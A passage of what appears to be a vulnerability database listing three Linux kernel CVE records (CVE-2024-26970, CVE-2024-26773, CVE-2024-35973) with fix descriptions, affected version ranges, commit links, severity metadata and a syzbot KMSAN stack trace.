              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: gcc-ipq6018: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:06.578Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ae60e3342296f766f88911d39199f77b05f657a6"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4527ee3de365a742215773d20f07db3e2c06f3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/852db52b45ea96dac2720f108e7c7331cd3738bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/421b135aceace99789c982f6a77ce9476564fb52"
        },
        {
          "url": "https://git.kernel.org/stable/c/dcb13b5c9ae8743f99a96f392186527c3df89198"
        },
        {
          "url": "https://git.kernel.org/stable/c/db4066e3ab6b3d918ae2b92734a89c04fe82cc1d"
        },
        {
          "url": "https://git.kernel.org/stable/c/cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d"
        }
      ],
      "title": "clk: qcom: gcc-ipq6018: fix terminating of frequency table arrays",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26970",
    "datePublished": "2024-05-01T05:19:55.293Z",
    "dateReserved": "2024-02-19T14:20:24.202Z",
    "dateUpdated": "2025-05-04T09:01:06.578Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26773 (GCVE-0-2024-26773)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2026-01-05 10:34

Title

ext4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()

Summary

In the Linux kernel, the following vulnerability has been resolved: ext4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found() Determine if the group block bitmap is corrupted before using ac_b_ex in ext4_mb_try_best_found() to avoid allocating blocks from a group with a corrupted block bitmap in the following concurrency and making the situation worse. ext4_mb_regular_allocator ext4_lock_group(sb, group) ext4_mb_good_group // check if the group bbitmap is corrupted ext4_mb_complex_scan_group // Scan group gets ac_b_ex but doesn't use it ext4_unlock_group(sb, group) ext4_mark_group_bitmap_corrupted(group) // The block bitmap was corrupted during // the group unlock gap. ext4_mb_try_best_found ext4_lock_group(ac->ac_sb, group) ext4_mb_use_best_found mb_mark_used // Allocating blocks in block bitmap corrupted group

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/21f8cfe79f7762874…
	https://git.kernel.org/stable/c/260fc96283c0f594d…
	https://git.kernel.org/stable/c/927794a02169778c9…
	https://git.kernel.org/stable/c/4c21fa60a6f4606f6…
	https://git.kernel.org/stable/c/f97e75fa4e12b0aa0…
	https://git.kernel.org/stable/c/0184747b552d6b5a1…
	https://git.kernel.org/stable/c/a2576ae9a35c078e4…
	https://git.kernel.org/stable/c/4530b3660d396a646…

Impacted products

Vendor

Product

Version

Linux

Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 21f8cfe79f776287459343e9cfa6055af61328ea (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 260fc96283c0f594de18a1b045faf6d8fb42874d (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 927794a02169778c9c2e7b25c768ab3ea8c1dc03 (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 4c21fa60a6f4606f6214a38f50612b17b2f738f5 (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < f97e75fa4e12b0aa0224e83fcbda8853ac2adf36 (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 0184747b552d6b5a14db3b7fcc3b792ce64dedd1 (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < a2576ae9a35c078e488f2c573e9e6821d651fbbe (git)
Affected: 163a203ddb36c36d4a1c942aececda0cc8d06aa7 , < 4530b3660d396a646aad91a787b6ab37cf604b53 (git)

Linux

Affected: 3.12
Unaffected: 0 , < 3.12 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26773",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T18:50:26.209110Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:10.181Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.512Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21f8cfe79f776287459343e9cfa6055af61328ea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/260fc96283c0f594de18a1b045faf6d8fb42874d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/927794a02169778c9c2e7b25c768ab3ea8c1dc03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c21fa60a6f4606f6214a38f50612b17b2f738f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f97e75fa4e12b0aa0224e83fcbda8853ac2adf36"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0184747b552d6b5a14db3b7fcc3b792ce64dedd1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a2576ae9a35c078e488f2c573e9e6821d651fbbe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4530b3660d396a646aad91a787b6ab37cf604b53"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/mballoc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "21f8cfe79f776287459343e9cfa6055af61328ea",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "260fc96283c0f594de18a1b045faf6d8fb42874d",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "927794a02169778c9c2e7b25c768ab3ea8c1dc03",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "4c21fa60a6f4606f6214a38f50612b17b2f738f5",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "f97e75fa4e12b0aa0224e83fcbda8853ac2adf36",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "0184747b552d6b5a14db3b7fcc3b792ce64dedd1",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "a2576ae9a35c078e488f2c573e9e6821d651fbbe",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            },
            {
              "lessThan": "4530b3660d396a646aad91a787b6ab37cf604b53",
              "status": "affected",
              "version": "163a203ddb36c36d4a1c942aececda0cc8d06aa7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/mballoc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.12"
            },
            {
              "lessThan": "3.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()\n\nDetermine if the group block bitmap is corrupted before using ac_b_ex in\next4_mb_try_best_found() to avoid allocating blocks from a group with a\ncorrupted block bitmap in the following concurrency and making the\nsituation worse.\n\next4_mb_regular_allocator\n  ext4_lock_group(sb, group)\n  ext4_mb_good_group\n   // check if the group bbitmap is corrupted\n  ext4_mb_complex_scan_group\n   // Scan group gets ac_b_ex but doesn\u0027t use it\n  ext4_unlock_group(sb, group)\n                           ext4_mark_group_bitmap_corrupted(group)\n                           // The block bitmap was corrupted during\n                           // the group unlock gap.\n  ext4_mb_try_best_found\n    ext4_lock_group(ac-\u003eac_sb, group)\n    ext4_mb_use_best_found\n      mb_mark_used\n      // Allocating blocks in block bitmap corrupted group"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:34:28.426Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/21f8cfe79f776287459343e9cfa6055af61328ea"
        },
        {
          "url": "https://git.kernel.org/stable/c/260fc96283c0f594de18a1b045faf6d8fb42874d"
        },
        {
          "url": "https://git.kernel.org/stable/c/927794a02169778c9c2e7b25c768ab3ea8c1dc03"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c21fa60a6f4606f6214a38f50612b17b2f738f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/f97e75fa4e12b0aa0224e83fcbda8853ac2adf36"
        },
        {
          "url": "https://git.kernel.org/stable/c/0184747b552d6b5a14db3b7fcc3b792ce64dedd1"
        },
        {
          "url": "https://git.kernel.org/stable/c/a2576ae9a35c078e488f2c573e9e6821d651fbbe"
        },
        {
          "url": "https://git.kernel.org/stable/c/4530b3660d396a646aad91a787b6ab37cf604b53"
        }
      ],
      "title": "ext4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26773",
    "datePublished": "2024-04-03T17:00:59.757Z",
    "dateReserved": "2024-02-19T14:20:24.176Z",
    "dateUpdated": "2026-01-05T10:34:28.426Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35973 (GCVE-0-2024-35973)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 12:56

Title

geneve: fix header validation in geneve[6]_xmit_skb

Summary

In the Linux kernel, the following vulnerability has been resolved: geneve: fix header validation in geneve[6]_xmit_skb syzbot is able to trigger an uninit-value in geneve_xmit() [1] Problem : While most ip tunnel helpers (like ip_tunnel_get_dsfield()) uses skb_protocol(skb, true), pskb_inet_may_pull() is only using skb->protocol. If anything else than ETH_P_IPV6 or ETH_P_IP is found in skb->protocol, pskb_inet_may_pull() does nothing at all. If a vlan tag was provided by the caller (af_packet in the syzbot case), the network header might not point to the correct location, and skb linear part could be smaller than expected. Add skb_vlan_inet_prepare() to perform a complete mac validation. Use this in geneve for the moment, I suspect we need to adopt this more broadly. v4 - Jakub reported v3 broke l2_tos_ttl_inherit.sh selftest - Only call __vlan_get_protocol() for vlan types. v2,v3 - Addressed Sabrina comments on v1 and v2 [1] BUG: KMSAN: uninit-value in geneve_xmit_skb drivers/net/geneve.c:910 [inline] BUG: KMSAN: uninit-value in geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030 geneve_xmit_skb drivers/net/geneve.c:910 [inline] geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030 __netdev_start_xmit include/linux/netdevice.h:4903 [inline] netdev_start_xmit include/linux/netdevice.h:4917 [inline] xmit_one net/core/dev.c:3531 [inline] dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3547 __dev_queue_xmit+0x348d/0x52c0 net/core/dev.c:4335 dev_queue_xmit include/linux/netdevice.h:3091 [inline] packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3081 [inline] packet_sendmsg+0x8bb0/0x9ef0 net/packet/af_packet.c:3113 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 __sys_sendto+0x685/0x830 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199 do_syscall_64+0xd5/0x1f0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 Uninit was created at: slab_post_alloc_hook mm/slub.c:3804 [inline] slab_alloc_node mm/slub.c:3845 [inline] kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577 __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668 alloc_skb include/linux/skbuff.h:1318 [inline] alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504 sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795 packet_alloc_skb net/packet/af_packet.c:2930 [inline] packet_snd net/packet/af_packet.c:3024 [inline] packet_sendmsg+0x722d/0x9ef0 net/packet/af_packet.c:3113 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 __sys_sendto+0x685/0x830 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199 do_syscall_64+0xd5/0x1f0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 CPU: 0 PID: 5033 Comm: syz-executor346 Not tainted 6.9.0-rc1-syzkaller-00005-g928a87efa423 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/43be590456e1f3566…
	https://git.kernel.org/stable/c/d3adf11d7993518a3…
	https://git.kernel.org/stable/c/10204df9beda4978b…
	https://git.kernel.org/stable/c/3c1ae6de74e3d2d63…
	https://git.kernel.org/stable/c/4a1b65d1e55d53b39…
	https://git.kernel.org/stable/c/190d9efa5773f26d6…
	https://git.kernel.org/stable/c/357163fff3a6e48fe…
	https://git.kernel.org/stable/c/d8a6213d70accb403…

Impacted products

Vendor

Product

Version

Linux

Affected: 35385daa8db320d2d9664930c28e732578b0d7de , < 43be590456e1f3566054ce78ae2dbb68cbe1a536 (git)
Affected: 6f92124d74419797fadfbcd5b7a72c384a6413ad , < d3adf11d7993518a39bd02b383cfe657ccc0023c (git)
Affected: 71ad9260c001b217d704cda88ecea251b2d367da , < 10204df9beda4978bd1d0c2db0d8375bfb03b915 (git)
Affected: d13f048dd40e8577260cd43faea8ec9b77520197 , < 3c1ae6de74e3d2d6333d29a2d3e13e6094596c79 (git)
Affected: d13f048dd40e8577260cd43faea8ec9b77520197 , < 4a1b65d1e55d53b397cb27014208be1e04172670 (git)
Affected: d13f048dd40e8577260cd43faea8ec9b77520197 , < 190d9efa5773f26d6f334b1b8be282c4fa13fd5e (git)
Affected: d13f048dd40e8577260cd43faea8ec9b77520197 , < 357163fff3a6e48fe74745425a32071ec9caf852 (git)
Affected: d13f048dd40e8577260cd43faea8ec9b77520197 , < d8a6213d70accb403b82924a1c229e733433a5ef (git)
Affected: 9a51e36ebf433adf59c051bec33f5aa54640bb4d (git)
Affected: 21815f28af8081b258552c111774ff320cf38d38 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35973",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:16:33.435108Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:56:09.359Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.047Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/43be590456e1f3566054ce78ae2dbb68cbe1a536"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d3adf11d7993518a39bd02b383cfe657ccc0023c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10204df9beda4978bd1d0c2db0d8375bfb03b915"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c1ae6de74e3d2d6333d29a2d3e13e6094596c79"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4a1b65d1e55d53b397cb27014208be1e04172670"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/190d9efa5773f26d6f334b1b8be282c4fa13fd5e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/357163fff3a6e48fe74745425a32071ec9caf852"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d8a6213d70accb403b82924a1c229e733433a5ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/geneve.c",
            "include/net/ip_tunnels.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "43be590456e1f3566054ce78ae2dbb68cbe1a536",
              "status": "affected",
              "version": "35385daa8db320d2d9664930c28e732578b0d7de",
              "versionType": "git"
            },
            {
              "lessThan": "d3adf11d7993518a39bd02b383cfe657ccc0023c",
              "status": "affected",
              "version": "6f92124d74419797fadfbcd5b7a72c384a6413ad",
              "versionType": "git"
            },
            {
              "lessThan": "10204df9beda4978bd1d0c2db0d8375bfb03b915",
              "status": "affected",
              "version": "71ad9260c001b217d704cda88ecea251b2d367da",
              "versionType": "git"
            },
            {
              "lessThan": "3c1ae6de74e3d2d6333d29a2d3e13e6094596c79",
              "status": "affected",
              "version": "d13f048dd40e8577260cd43faea8ec9b77520197",
              "versionType": "git"
            },
            {
              "lessThan": "4a1b65d1e55d53b397cb27014208be1e04172670",
              "status": "affected",
              "version": "d13f048dd40e8577260cd43faea8ec9b77520197",
              "versionType": "git"
            },
            {
              "lessThan": "190d9efa5773f26d6f334b1b8be282c4fa13fd5e",
              "status": "affected",
              "version": "d13f048dd40e8577260cd43faea8ec9b77520197",
              "versionType": "git"
            },
            {
              "lessThan": "357163fff3a6e48fe74745425a32071ec9caf852",
              "status": "affected",
              "version": "d13f048dd40e8577260cd43faea8ec9b77520197",
              "versionType": "git"
            },
            {
              "lessThan": "d8a6213d70accb403b82924a1c229e733433a5ef",
              "status": "affected",
              "version": "d13f048dd40e8577260cd43faea8ec9b77520197",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "9a51e36ebf433adf59c051bec33f5aa54640bb4d",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "21815f28af8081b258552c111774ff320cf38d38",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/geneve.c",
            "include/net/ip_tunnels.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.19.191",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.4.119",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.10.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
